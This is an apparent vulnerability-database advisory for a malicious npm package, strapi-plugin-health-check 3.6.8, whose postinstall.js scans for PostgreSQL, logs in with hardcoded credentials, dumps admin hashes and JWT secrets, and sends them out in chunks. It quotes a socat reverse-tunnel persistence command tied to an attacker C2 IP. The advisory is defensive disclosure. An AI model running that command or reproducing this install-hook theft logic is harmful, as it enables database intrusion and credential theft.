VDB
GCVE-110-OSM-2026-1213
GCVE-110-OSM-2026-1213
Advisory PublishedCVSS 9.6/10
Connects to a live PostgreSQL instance, dumps the complete strapi_administrator table (bcrypt admin hashes + emails), users-permissions_user table (all CMS user accounts + password hashes), and the entire core_store table (JWT signing secrets, API keys, plugin configs). Installs a persistent socat reverse tunnel (nohup socat TCP-LISTEN:15432,fork,reuseaddr TCP:127.0.0.1:5432 &) forwarding the victim's PostgreSQL port to the attacker C2 144.31.107.231, giving persistent direct DB access after the
postinstall.js (193 lines): (1) Probes 127.0.0.1:5432, then Docker bridge IPs 172.17.0.1–172.20.77.2 and 128.140.36.223 for open PostgreSQL. (2) Connects using hardcoded credentials (user_strapi / 1QKtYPp18UsyU2ZwInVM) then escalates to postgres / 1QKtYPp18UsyU2ZwInVM for superuser access. (3) Dumps: all tables with row counts, core_store (ALL rows), strapi_administrator, users-permissions_user, wallet/payment/transaction table contents. (4) Reads Strapi source files: deploy/*.groovy, config/*.js, helpers/*.js, extensions/. (5) Sets up persistent tunnel: execSync('nohup socat TCP-LISTEN:15432,fork,reuseaddr TCP:127.0.0.1:5432 &'). Chunked exfil in 50 KB blocks allows extraction of large databases.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | strapi-plugin-health-check | 3.6.8 (affected) | — |
Browse GCVE Records
72,664 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.